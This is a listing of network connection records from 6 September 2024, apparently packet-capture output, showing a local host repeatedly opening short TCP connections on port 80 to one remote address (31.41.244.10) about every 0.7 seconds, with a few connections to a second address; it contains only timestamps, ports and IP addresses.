Sep 6, 2024 10:00:43.992038965 CEST	51384	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.996870995 CEST	80	51384	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:44.695631981 CEST	80	51384	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:44.695758104 CEST	51384	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:44.698829889 CEST	51384	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:44.699145079 CEST	51385	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:44.703891993 CEST	80	51384	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:44.704004049 CEST	80	51385	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:44.704005003 CEST	51384	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:44.704229116 CEST	51385	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:44.704229116 CEST	51385	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:44.709078074 CEST	80	51385	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:45.424644947 CEST	80	51385	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:45.426148891 CEST	51385	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:45.532779932 CEST	51385	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:45.533101082 CEST	51386	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:45.538068056 CEST	80	51385	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:45.538085938 CEST	80	51386	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:45.538355112 CEST	51385	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:45.538391113 CEST	51386	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:45.538599968 CEST	51386	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:45.543379068 CEST	80	51386	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:46.235137939 CEST	80	51386	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:46.236013889 CEST	51386	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:46.239116907 CEST	51386	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:46.239528894 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:46.245467901 CEST	80	51386	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:46.245501995 CEST	80	51387	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:46.245587111 CEST	51386	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:46.245630026 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:46.245807886 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:46.250566006 CEST	80	51387	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:47.710426092 CEST	80	51387	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:47.710961103 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.710978985 CEST	80	51387	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:47.711297035 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.711388111 CEST	80	51387	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:47.711597919 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.823331118 CEST	51388	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.823334932 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.828649044 CEST	80	51388	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:47.828941107 CEST	80	51387	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:47.831238985 CEST	51387	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.831240892 CEST	51388	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.831854105 CEST	51388	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:47.836672068 CEST	80	51388	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:48.552218914 CEST	80	51388	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:48.552318096 CEST	51388	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:48.556334972 CEST	51388	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:48.556813955 CEST	51389	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:48.561753035 CEST	80	51388	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:48.561770916 CEST	80	51389	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:48.561830044 CEST	51388	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:48.561872959 CEST	51389	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:48.562033892 CEST	51389	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:48.566814899 CEST	80	51389	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:49.265151978 CEST	80	51389	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:49.265259027 CEST	51389	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:49.371804953 CEST	51389	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:49.372200966 CEST	51390	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:49.377048969 CEST	80	51390	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:49.377196074 CEST	51390	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:49.377278090 CEST	80	51389	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:49.377304077 CEST	51390	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:49.377386093 CEST	51389	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:49.382062912 CEST	80	51390	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:49.671473026 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:49.671474934 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:49.676475048 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:49.676497936 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:50.102510929 CEST	80	51390	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.102658987 CEST	51390	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.106161118 CEST	51390	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.106165886 CEST	51391	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.111181021 CEST	80	51391	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.111366034 CEST	51391	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.111552954 CEST	80	51390	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.111629009 CEST	51391	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.111629963 CEST	51390	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.116575956 CEST	80	51391	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.818659067 CEST	80	51391	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.818784952 CEST	51391	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.930151939 CEST	51391	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.930447102 CEST	51392	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.935285091 CEST	80	51392	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.935534000 CEST	80	51391	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:50.938019991 CEST	51391	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.938030958 CEST	51392	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.938235998 CEST	51392	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:50.943020105 CEST	80	51392	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:51.632647991 CEST	80	51392	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:51.632716894 CEST	51392	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:51.635550022 CEST	51392	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:51.635828972 CEST	51393	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:51.640569925 CEST	80	51393	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:51.640636921 CEST	80	51392	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:51.640669107 CEST	51393	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:51.640706062 CEST	51392	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:51.641009092 CEST	51393	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:51.645766020 CEST	80	51393	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:52.351345062 CEST	80	51393	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:52.351511955 CEST	51393	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:52.467279911 CEST	51393	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:52.467696905 CEST	51394	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:52.472394943 CEST	80	51393	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:52.472496986 CEST	51393	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:52.472497940 CEST	80	51394	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:52.472554922 CEST	51394	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:52.472902060 CEST	51394	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:52.477639914 CEST	80	51394	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:53.162461042 CEST	80	51394	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:53.162555933 CEST	51394	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:53.165792942 CEST	51394	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:53.166058064 CEST	51395	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:53.170852900 CEST	80	51394	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:53.170865059 CEST	80	51395	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:53.170907021 CEST	51394	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:53.170938969 CEST	51395	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:53.171574116 CEST	51395	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:53.176348925 CEST	80	51395	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:53.899626017 CEST	80	51395	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:53.899774075 CEST	51395	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.019280910 CEST	51396	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.019279957 CEST	51395	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.024106026 CEST	80	51396	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:54.024558067 CEST	80	51395	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:54.024651051 CEST	51396	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.027802944 CEST	51396	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.027892113 CEST	51395	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.032562971 CEST	80	51396	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:54.738866091 CEST	80	51396	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:54.738998890 CEST	51396	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.742944002 CEST	51396	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.743267059 CEST	51397	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.747853041 CEST	80	51396	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:54.747915983 CEST	51396	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.747988939 CEST	80	51397	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:54.748100996 CEST	51397	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.748362064 CEST	51397	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:54.753129959 CEST	80	51397	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:55.460526943 CEST	80	51397	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:55.460650921 CEST	51397	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:55.564903975 CEST	51397	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:55.565217972 CEST	51398	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:55.570029974 CEST	80	51398	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:55.570055008 CEST	80	51397	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:55.570178032 CEST	51397	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:55.570190907 CEST	51398	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:55.570457935 CEST	51398	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:55.575289965 CEST	80	51398	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:56.271018028 CEST	80	51398	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:56.274723053 CEST	51398	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:56.277808905 CEST	51398	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:56.278122902 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:56.282696962 CEST	80	51398	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:56.282886982 CEST	80	51399	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:56.282953978 CEST	51398	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:56.283021927 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:56.283279896 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:56.287987947 CEST	80	51399	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:57.231940985 CEST	80	51399	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:57.232037067 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.232551098 CEST	80	51399	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:57.232603073 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.349339962 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.349747896 CEST	51400	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.354655027 CEST	80	51399	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:57.354670048 CEST	80	51400	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:57.354727983 CEST	51399	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.354764938 CEST	51400	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.355021000 CEST	51400	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:57.359745979 CEST	80	51400	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.044606924 CEST	80	51400	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.044795990 CEST	51400	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.047988892 CEST	51400	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.048247099 CEST	51401	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.053023100 CEST	80	51401	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.053083897 CEST	80	51400	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.053224087 CEST	51401	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.053236008 CEST	51400	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.054316044 CEST	51401	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.059072018 CEST	80	51401	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.788018942 CEST	80	51401	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.788110018 CEST	51401	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.900578022 CEST	51401	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.900885105 CEST	51402	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.905675888 CEST	80	51402	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.905791998 CEST	80	51401	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:58.905821085 CEST	51402	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.905889034 CEST	51401	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.906413078 CEST	51402	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:58.911205053 CEST	80	51402	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:59.634313107 CEST	80	51402	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:59.634454966 CEST	51402	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:59.637778044 CEST	51402	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:59.638133049 CEST	51403	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:59.642985106 CEST	80	51402	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:59.642997980 CEST	80	51403	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:59.643122911 CEST	51403	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:59.643124104 CEST	51402	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:59.643266916 CEST	51403	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:59.648020029 CEST	80	51403	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:59.676774025 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:59.676774025 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:59.681997061 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:59.682013035 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:01:00.354486942 CEST	80	51403	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:00.354639053 CEST	51403	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:00.465755939 CEST	51403	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:00.466002941 CEST	51404	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:00.470916986 CEST	80	51404	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:00.471091032 CEST	80	51403	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:00.471092939 CEST	51404	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:00.471163034 CEST	51403	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:00.471482038 CEST	51404	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:00.476262093 CEST	80	51404	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:01.178118944 CEST	80	51404	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:01.178220987 CEST	51404	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.180995941 CEST	51404	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.181299925 CEST	51405	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.185997009 CEST	80	51404	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:01.186075926 CEST	80	51405	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:01.186090946 CEST	51404	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.186142921 CEST	51405	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.302335978 CEST	51406	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.307238102 CEST	80	51406	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:01.309457064 CEST	51406	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.309633017 CEST	51406	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:01.314413071 CEST	80	51406	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.017513990 CEST	80	51406	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.017636061 CEST	51406	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.021276951 CEST	51406	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.021615982 CEST	51407	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.026467085 CEST	80	51406	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.026479959 CEST	80	51407	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.026551962 CEST	51406	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.026699066 CEST	51407	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.027044058 CEST	51407	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.031827927 CEST	80	51407	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.737862110 CEST	80	51407	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.737970114 CEST	51407	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.846052885 CEST	51407	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.846348047 CEST	51408	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.851187944 CEST	80	51408	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.851284981 CEST	51408	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.851301908 CEST	80	51407	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:02.851383924 CEST	51407	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.851591110 CEST	51408	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:02.856308937 CEST	80	51408	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:03.545188904 CEST	80	51408	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:03.545263052 CEST	51408	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:03.549150944 CEST	51408	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:03.549443960 CEST	51409	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:03.554125071 CEST	80	51408	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:03.554233074 CEST	80	51409	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:03.565490007 CEST	51408	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:03.565552950 CEST	51409	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:03.566175938 CEST	51409	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:03.570965052 CEST	80	51409	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:04.275034904 CEST	80	51409	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:04.275168896 CEST	51409	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:04.388240099 CEST	51409	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:04.388556957 CEST	51410	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:04.393640995 CEST	80	51409	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:04.393702030 CEST	80	51410	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:04.396819115 CEST	51409	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:04.396864891 CEST	51410	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:04.397979975 CEST	51410	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:04.402790070 CEST	80	51410	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.117748976 CEST	80	51410	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.117860079 CEST	51410	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.120532036 CEST	51410	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.120876074 CEST	51411	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.125742912 CEST	80	51411	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.125858068 CEST	51411	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.125895977 CEST	80	51410	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.125971079 CEST	51410	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.126128912 CEST	51411	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.130934954 CEST	80	51411	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.857825041 CEST	80	51411	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.859606028 CEST	51411	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.983022928 CEST	51411	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.983405113 CEST	51412	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.988295078 CEST	80	51412	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.988322020 CEST	80	51411	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:05.988411903 CEST	51411	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.988488913 CEST	51412	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.988667011 CEST	51412	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:05.993421078 CEST	80	51412	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:06.704777002 CEST	80	51412	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:06.704874992 CEST	51412	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:06.707959890 CEST	51412	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:06.708367109 CEST	51413	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:06.713128090 CEST	80	51412	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:06.713255882 CEST	51412	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:06.713316917 CEST	80	51413	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:06.713438034 CEST	51413	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:06.713727951 CEST	51413	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:06.718480110 CEST	80	51413	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:07.417579889 CEST	80	51413	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:07.418941021 CEST	51413	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:07.526305914 CEST	51414	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:07.526305914 CEST	51413	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:07.531305075 CEST	80	51414	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:07.531583071 CEST	80	51413	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:07.532001972 CEST	51414	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:07.532001972 CEST	51413	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:07.532115936 CEST	51414	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:07.536953926 CEST	80	51414	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:08.256442070 CEST	80	51414	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:08.256539106 CEST	51414	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:08.259387970 CEST	51414	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:08.259758949 CEST	51415	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:08.264435053 CEST	80	51414	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:08.264523029 CEST	80	51415	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:08.264544010 CEST	51414	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:08.264848948 CEST	51415	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:08.265146017 CEST	51415	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:08.269886971 CEST	80	51415	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:08.987447977 CEST	80	51415	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:08.987580061 CEST	51415	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.099347115 CEST	51415	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.099670887 CEST	51416	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.104490995 CEST	80	51416	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:09.104513884 CEST	80	51415	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:09.104605913 CEST	51415	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.104624033 CEST	51416	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.104792118 CEST	51416	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.109548092 CEST	80	51416	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:09.478862047 CEST	51416	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.484610081 CEST	51417	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:01:09.489458084 CEST	80	51417	31.41.244.10	192.168.2.7
Sep 6, 2024 10:01:09.489634037 CEST	51417	80	192.168.2.7	31.41.244.10
